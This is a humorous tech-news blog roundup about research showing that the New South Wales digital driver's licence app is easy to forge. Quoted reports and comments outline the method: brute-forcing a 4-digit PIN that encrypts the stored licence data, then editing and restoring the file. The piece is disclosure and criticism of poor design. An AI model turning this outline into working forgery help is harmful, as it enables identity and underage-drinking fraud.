Digital Driver’s License Fails Spectacularly — ‘Laughably Easy’ to Forge

Is your state implementing a digital driver’s license? You’d better hope it does better than the Australian state of New South Wales.

Researchers show NSW’s mobile app is ridiculously insecure. Want to drink underage? Bloody oath! Want to steal someone’s identity? No wukkas, mate.

What a bunch of galahs. In today’s SB Blogwatch, we pop out in the ute and drive to woop woop.

Your humble blogwatcher curated these bloggy bits for your entertainment. Not to mention: Elon is wrong.

ServiceNSW’s Reaction was NSFW

What’s the craic? Erin Marquis reports—“Digital Drivers Licenses Are Hilariously Easy to Forge”:

Four million Australians use this app every day
The U.S. is just beginning to experiment with digital driver’s licenses … (despite public comments worrying that the licenses were the “mark of the beast”). … New South Wales in Australia, however, started offering such licenses in late 2019. [But they] are not as airtight as promised.

They’re laughably easy to hack, even by an unsophisticated, casual fraud. [You] can change any data [you] want. … All you need is an average, off-the-shelf PC and a widely-available PIN-breaking script.

Around four million Australians use this app every day as their preferred form of government identification.

And Dan Goodin adds in—“‘Tough to Forge’ Digital Driver’s Licenses Are—Yep—Easy to Forge”:

A variety of design flaws
The new licenses allowed people to use their iPhone or Android device to show proof of identity and age during roadside police checks or at bars, stores, hotels, and other venues. ServiceNSW, as the government body is usually referred to, promised it would “provide additional levels of security and protection against identity fraud,” [and] that security was a key priority.

[But] security researchers have shown that it’s trivial for just about anyone to forge fake identities. [It] allows people under drinking age to change their date of birth and for fraudsters to forge fake identities. … A variety of design flaws make this simple hack possible:

    • A lack of adequate encryption. …
    • Astonishingly, DDL data is never validated against the back-end database. …
    • Using the “pull-to-refresh” function … fails to refresh any of the data. …
    • The app allows the data it stores to be backed up, [edited] and restored.

Horse’s mouth? Noah Farmer reaps what he sows—“Digital Drivers Licence Security appears to be Super Bad”:

False sense of trust
Upon its initial trial launch, the security of the Digital Driver Licence was to no one’s surprise scrutinised by the public and there were multiple issues & security recommendations called out. One example is when a researcher … presented his findings at Pycon AU 2019 [and] demonstrated that he was able to modify Digital Driver Licence details locally on the mobile device in order to show false information. … It is unclear if this bug was considered an accepted risk or if remediation was ever attempted by ServiceNSW.

On iOS, the Digital Driver Licence data is stored in a JSON file … encrypted using AES-256-CBC encryption combined with Base64 encoding. A 4-digit application PIN … is the encryption password [which you] could easily brute-force. … Anyone wanting to commit fraud can modify their licence details without needing to jailbreak their device. … The application has no native method to validate the Digital Driver Licence data that exists on the phone and thus cannot [test if] this data has been modified. … When an unsuspecting victim scans the fraudsters QR code, everything will check out.

With this overall lack of secure design, licence features such as QR code scanning, the animated NSW Government logo, last refreshed time (and swipe-to-refresh), animated Waratah hologram, licence photo watermark, horizontal view, and others appear exactly as if the licence was genuine, creating a false sense of trust.

ELI5? Zak3056 explains like we’re five:

The data is stored in an encrypted file whose key is a four digit PIN (i.e., 10,000 combinations at most required to decrypt. … Once decrypted, the data is in a text file that is trivially edited, reencrypted, and reuploaded to the device.

A four-digit PIN as an encyption key? millebi waxes excoriating:

So, has nobody in NSW heard about digital signatures that use a public key? It would have allowed verification offline and tamper resistance and all phones would have the public key to verify but not the private key to encrypt. … Talk about a 1980s solution!

How could this possibly happen? MpVpRb knows:

Real crypto security is hard—really hard. And only a very few know how to do it. Government officials who pay for stuff like this are clueless and have no way to guarantee that the stuff they buy actually works. Semi-competent security companies see a pot of gold.

ikr? And Denton Scratch agrees:

That sounds amazingly incompetent. I’m … disinclined to trust software developed by government departments (or their contractors). I’ve worked in that particular sausage factory, and it put me off sausages.

It turns out there’s an ISO standard for exactly this problem, as swillden notes:

Just implement the ISO 18013-5 standard, which has well-designed security, is careful to ensure that you never have to hand anyone your phone, and is also very careful about other aspects privacy, taking care to ensure that license presentations aren’t inherently linkable and that data minimization is possible (you can provide only the information required, e.g., if you’re buying alcohol you can prove that you’re over 21 without providing any other information).

I know because I designed the ISO 18013-5 crypto security protocol (though the final version isn’t exactly what I designed—it was slightly improved by cryptographers from NIST, Google and Apple). This ISO standard is what Apple implemented recently, BTW, and what Android launched support for in 2019. It’s actually very well done, and the security has been thoroughly reviewed.

I wonder why Paul S. declines to give his full name:

Various Australian states have been blundering around with digital/smart-card driver’s licenses for at least ten years, wasting tens and possibly hundreds of millions of dollars on projects that their techs told them from the start could never work. … There’s an IT failure book in there waiting to be written once I retire and don’t have to worry about work-related consequences any more.

I was involved with the Queensland fiasco. … Trying to tell the mgt. that issuing certificates on an IBM mainframe stored in ISAM files talking to Java connectors with … ohgodohgod I’m getting horror flashbacks.

Meanwhile, what have we learned? HiredGoons goes all pedagogical on us:

Trying to brand your technology as unhackable is a surefire way to ensure it gets hacked.

And Finally:

“Absolute trainwreck”

CWs: Musk, a few F-bombs, Hitchhiker’s Guide echoes

Previously in And Finally


You have been reading SB Blogwatch by Richi Jennings. Richi curates the best bloggy bits, finest forums, and weirdest websites … so you don’t have to. Hate mail may be directed to @RiCHi or [email protected]. Ask your doctor before reading. Your mileage may vary. E&OE. 30.

Image sauce: ServiceNSW

Richi Jennings

Richi Jennings is a foolish independent industry analyst, editor, and content strategist. A former developer and marketer, he’s also written or edited for Computerworld, Microsoft, Cisco, Micro Focus, HashiCorp, Ferris Research, Osterman Research, Orthogonal Thinking, Native Trust, Elgan Media, Petri, Cyren, Agari, Webroot, HP, HPE, NetApp on Forbes and CIO.com. Bizarrely, his ridiculous work has even won awards from the American Society of Business Publication Editors, ABM/Jesse H. Neal, and B2B Magazine.

richi has 590 posts and counting.See all posts by richi